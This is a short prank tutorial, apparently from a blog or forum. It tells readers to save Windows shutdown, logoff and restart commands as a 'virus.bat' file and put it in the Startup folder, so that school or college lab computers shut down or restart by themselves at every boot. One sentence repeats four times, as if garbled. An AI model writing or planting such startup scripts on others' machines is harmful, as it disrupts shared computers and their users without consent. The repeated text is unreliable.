Actually, this is not a virus but can be use to irritate your frens and can be try at your school or college lab for fun. Just copy or type in notepad and save it as "virus.bat".
code:
shutdown -f -s -t 3
Above code will shutdown the computer in 3 seconds, if virus.bat file is run. If we want to run it automatically at startup. Just copy the file you created (here is virus.bat) paste it on this location "C:\Documents and Settings\User\Start Menu\Programs\Startup"This will shutdown the computer in 3 second(you can change the time).This will shutdown the computer in 3 second(you can change the time).This will shutdown the computer in 3 second(you can change the time).This will shutdown the computer in 3 second(you can change the time).
Not only shutdown, we can do logoff and restart the computer also. Here is the code.
code:
shutdown -f -l -t 3 //for logoff
shutdown -f -r -t 3 // for restart
Make seperate file for each code.
Have fun...


